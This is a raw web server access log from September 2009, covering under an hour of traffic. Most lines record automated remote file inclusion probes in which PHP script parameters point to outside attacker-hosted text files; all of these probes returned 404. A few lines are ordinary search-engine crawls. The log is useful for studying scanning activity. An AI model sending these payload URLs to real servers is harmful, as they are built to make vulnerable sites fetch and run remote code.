121.78.116.209 - - [11/Sep/2009:00:10:05 -0500] "GET /noticias.php?arq=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
121.78.116.209 - - [11/Sep/2009:00:10:05 -0500] "GET /logs/noticias.php?arq=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
121.78.116.209 - - [11/Sep/2009:00:10:05 -0500] "GET /logs/access_log.1251763200/noticias.php?arq=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
125.247.60.3 - - [11/Sep/2009:00:11:19 -0500] "GET /contenido.php?sec=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
125.247.60.3 - - [11/Sep/2009:00:11:20 -0500] "GET /logs/contenido.php?sec=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
125.247.60.3 - - [11/Sep/2009:00:11:22 -0500] "GET /logs/access_log.1251763200/contenido.php?sec=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
125.247.60.3 - - [11/Sep/2009:00:11:22 -0500] "GET /logs/template.php?name=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
125.247.60.3 - - [11/Sep/2009:00:11:22 -0500] "GET /logs/access_log.1251763200/template.php?name=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
125.247.60.3 - - [11/Sep/2009:00:11:24 -0500] "GET /template.php?name=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
65.55.207.75 - - [11/Sep/2009:00:11:37 -0500] "GET /logs/access_log.1162684800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.191.68.53 - - [11/Sep/2009:00:13:49 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
64.191.68.53 - - [11/Sep/2009:00:13:49 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
64.191.68.53 - - [11/Sep/2009:00:13:49 -0500] "GET /logs/access_log.1239321600///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
121.78.116.209 - - [11/Sep/2009:00:15:37 -0500] "GET /forum.php?act=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
121.78.116.209 - - [11/Sep/2009:00:15:37 -0500] "GET /logs/forum.php?act=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
121.78.116.209 - - [11/Sep/2009:00:15:37 -0500] "GET /logs/access_log.1251763200/forum.php?act=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.148.68.101 - - [11/Sep/2009:00:16:57 -0500] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
66.148.68.101 - - [11/Sep/2009:00:16:57 -0500] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
66.148.68.101 - - [11/Sep/2009:00:16:58 -0500] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
66.148.68.101 - - [11/Sep/2009:00:16:58 -0500] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
65.55.207.71 - - [11/Sep/2009:00:20:37 -0500] "GET /logs/access_log.1126483200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
41.220.115.83 - - [11/Sep/2009:00:20:54 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
41.220.115.83 - - [11/Sep/2009:00:20:54 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
41.220.115.83 - - [11/Sep/2009:00:20:54 -0500] "GET /logs/access_log.1239321600///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
212.98.171.91 - - [11/Sep/2009:00:21:03 -0500] "GET //skin/zero_vote/error.php?dir=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
212.98.171.91 - - [11/Sep/2009:00:21:07 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
212.98.171.91 - - [11/Sep/2009:00:21:07 -0500] "GET /logs/access_log.1236211200//skin/zero_vote/error.php?dir=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
212.98.171.91 - - [11/Sep/2009:00:21:07 -0500] "GET /logs/access_log.1244764800//skin/zero_vote/error.php?dir=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:00:22:59 -0500] "GET /logs/access_log.1250985600//products?q=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:00:22:59 -0500] "GET /logs//products?q=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:00:22:59 -0500] "GET //products?q=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:00:22:59 -0500] "GET /logs//products?q=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:00:22:59 -0500] "GET /logs/access_log.1250985600//products?q=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:00:22:59 -0500] "GET //products?q=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:00:23:10 -0500] "GET /logs/access_log.1249344000//products?q=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:00:23:10 -0500] "GET /logs/access_log.1249344000//products?q=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:00:25:33 -0500] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:00:25:33 -0500] "GET /logs/access_log.1247875200/index/wp-content/plugins/Enigma2.php?boarddir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:00:25:33 -0500] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:00:25:53 -0500] "GET /logs/access_log.1247616000/index/wp-content/plugins/Enigma2.php?boarddir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
74.200.89.25 - - [11/Sep/2009:00:26:24 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.200.89.25 - - [11/Sep/2009:00:26:24 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.200.89.25 - - [11/Sep/2009:00:26:24 -0500] "GET /logs/access_log.1240444800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
74.200.89.25 - - [11/Sep/2009:00:26:28 -0500] "GET /logs/access_log.1250985600/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:00:27:16 -0500] "GET //domain_whois.do?domain=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:00:27:16 -0500] "GET /logs//domain_whois.do?domain=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:00:27:16 -0500] "GET /logs/access_log.1251763200//domain_whois.do?domain=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:27:44 -0500] "GET /logs//vwar/admin/admin.php?vwar_root=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:27:44 -0500] "GET //vwar/admin/admin.php?vwar_root=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:27:44 -0500] "GET /logs/access_log.1230076800//vwar/admin/admin.php?vwar_root=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:27:49 -0500] "GET /logs/access_log.1243036800//vwar/admin/admin.php?vwar_root=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:27:49 -0500] "GET /logs/access_log.1247356800//vwar/admin/admin.php?vwar_root=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:27:49 -0500] "GET /logs/access_log.1245715200//vwar/admin/admin.php?vwar_root=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:27:54 -0500] "GET /logs/access_log.1246147200//vwar/admin/admin.php?vwar_root=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:27:54 -0500] "GET /logs/access_log.1247184000//vwar/admin/admin.php?vwar_root=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:27:54 -0500] "GET /logs/access_log.1242950400//vwar/admin/admin.php?vwar_root=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:27:54 -0500] "GET /logs/access_log.1247097600//vwar/admin/admin.php?vwar_root=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:27:54 -0500] "GET /logs/access_log.1232236800//vwar/admin/admin.php?vwar_root=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:27:54 -0500] "GET /logs/access_log.1239580800//vwar/admin/admin.php?vwar_root=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
65.55.207.119 - - [11/Sep/2009:00:28:07 -0500] "GET /logs/access_log.1137283200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.98.171.91 - - [11/Sep/2009:00:28:08 -0500] "GET /logs/access_log.1236038400//skin/zero_vote/error.php?dir=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:28:12 -0500] "GET /logs/access_log.1242777600//vwar/admin/admin.php?vwar_root=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.148.68.101 - - [11/Sep/2009:00:29:33 -0500] "GET //domain_whois.do?domain=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.148.68.101 - - [11/Sep/2009:00:29:33 -0500] "GET /logs/access_log.1251763200//domain_whois.do?domain=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.148.68.101 - - [11/Sep/2009:00:29:33 -0500] "GET /logs//domain_whois.do?domain=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
65.55.106.138 - - [11/Sep/2009:00:29:37 -0500] "GET /logs/access_log.1211587200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.148.68.101 - - [11/Sep/2009:00:30:05 -0500] "GET //domain_whois.do?domain=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.148.68.101 - - [11/Sep/2009:00:30:06 -0500] "GET /logs//domain_whois.do?domain=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
66.148.68.101 - - [11/Sep/2009:00:30:06 -0500] "GET /logs/access_log.1251763200//domain_whois.do?domain=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:00:30:53 -0500] "GET /logs/access_log.1250985600//products?q=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:00:30:53 -0500] "GET /logs//products?q=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:00:30:53 -0500] "GET //products?q=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:00:31:03 -0500] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:00:31:04 -0500] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:00:31:04 -0500] "GET /logs/access_log.1247875200/index/wp-content/plugins/Enigma2.php?boarddir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:00:31:08 -0500] "GET /logs//products?q=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:00:31:09 -0500] "GET /logs/access_log.1250985600//products?q=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:00:31:09 -0500] "GET //products?q=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
41.220.115.83 - - [11/Sep/2009:00:31:11 -0500] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
41.220.115.83 - - [11/Sep/2009:00:31:11 -0500] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
41.220.115.83 - - [11/Sep/2009:00:31:11 -0500] "GET /logs/access_log.1248048000////skin/ggambo7002_board/comment_modify.php?dir=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:00:31:16 -0500] "GET /logs/access_log.1249344000//products?q=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:00:31:19 -0500] "GET /logs/access_log.1249344000//products?q=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:00:31:25 -0500] "GET /logs/access_log.1247616000/index/wp-content/plugins/Enigma2.php?boarddir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
72.51.42.92 - - [11/Sep/2009:00:31:58 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.frostbytes.com/regina/idx.txt%0D?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
72.51.42.92 - - [11/Sep/2009:00:31:58 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.frostbytes.com/regina/idx.txt%0D?? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
117.74.98.18 - - [11/Sep/2009:00:32:06 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
117.74.98.18 - - [11/Sep/2009:00:32:09 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
117.74.98.18 - - [11/Sep/2009:00:32:09 -0500] "GET /logs/access_log.1239321600///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
117.74.98.18 - - [11/Sep/2009:00:32:11 -0500] "GET /logs/access_log.1241395200///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
72.51.42.92 - - [11/Sep/2009:00:35:10 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://super.gameshot.net/ps3/zboard/data/cok.txt????? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
72.51.42.92 - - [11/Sep/2009:00:35:10 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://super.gameshot.net/ps3/zboard/data/cok.txt????? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
74.52.17.34 - - [11/Sep/2009:00:37:50 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
74.52.17.34 - - [11/Sep/2009:00:37:50 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
74.52.17.34 - - [11/Sep/2009:00:37:51 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
74.52.17.34 - - [11/Sep/2009:00:37:56 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:39:38 -0500] "GET //config/dbutil.bck.php?confdir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:39:38 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:39:38 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:40:03 -0500] "GET /logs/access_log.1244851200//config/dbutil.bck.php?confdir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.175.25.226 - - [11/Sep/2009:00:43:10 -0500] "GET /logs/access_log.1251763200/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.175.25.226 - - [11/Sep/2009:00:43:10 -0500] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
69.175.25.226 - - [11/Sep/2009:00:43:10 -0500] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.175.25.226 - - [11/Sep/2009:00:43:20 -0500] "GET /logs/access_log.1248134400/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.146.119.209 - - [11/Sep/2009:00:43:33 -0500] "GET /logs/access_log.1251763200/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.146.119.209 - - [11/Sep/2009:00:43:33 -0500] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
82.146.119.209 - - [11/Sep/2009:00:43:33 -0500] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
82.146.119.209 - - [11/Sep/2009:00:43:42 -0500] "GET /logs/access_log.1248134400/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
114.111.36.26 - - [11/Sep/2009:00:44:11 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)"
114.111.36.26 - - [11/Sep/2009:00:44:26 -0500] "GET / HTTP/1.1" 200 3245 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)"
67.210.126.60 - - [11/Sep/2009:00:45:24 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
67.210.126.60 - - [11/Sep/2009:00:45:24 -0500] "GET /logs/access_log.1244764800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
67.210.126.60 - - [11/Sep/2009:00:45:24 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:00:45:36 -0500] "GET /logs/access_log.1236211200//config/dbutil.bck.php?confdir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
72.51.42.92 - - [11/Sep/2009:00:50:46 -0500] "GET /index.php?file=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
72.51.42.92 - - [11/Sep/2009:00:50:46 -0500] "GET /logs/index.php?file=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.51.42.92 - - [11/Sep/2009:00:50:46 -0500] "GET /logs/access_log.1246406400/index.php?file=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
72.51.42.92 - - [11/Sep/2009:00:50:59 -0500] "GET /logs/access_log.1239667200/index.php?file=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
74.52.17.34 - - [11/Sep/2009:00:52:06 -0500] "GET /logs/access_log.1236211200//include/admin.lib.inc.php?site_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
74.52.17.34 - - [11/Sep/2009:00:52:28 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
74.52.17.34 - - [11/Sep/2009:00:52:28 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
74.52.17.34 - - [11/Sep/2009:00:52:28 -0500] "GET /logs/access_log.1243555200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
74.52.17.34 - - [11/Sep/2009:00:52:59 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
65.55.207.126 - - [11/Sep/2009:00:54:37 -0500] "GET /logs/access_log.1125360000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
204.202.2.23 - - [11/Sep/2009:00:56:20 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
204.202.2.23 - - [11/Sep/2009:00:56:20 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
204.202.2.23 - - [11/Sep/2009:00:56:20 -0500] "GET /logs/access_log.1242432000//include/mail.inc.php?skin_board_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
204.202.2.23 - - [11/Sep/2009:00:56:24 -0500] "GET /logs/access_log.1242172800//include/mail.inc.php?skin_board_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
65.55.207.24 - - [11/Sep/2009:00:56:37 -0500] "GET /logs/access_log.1155945600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
59.24.49.35 - - [11/Sep/2009:00:56:40 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:00:56:41 -0500] "GET /logs/access_log.1236211200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:00:56:41 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:00:56:43 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:00:56:43 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
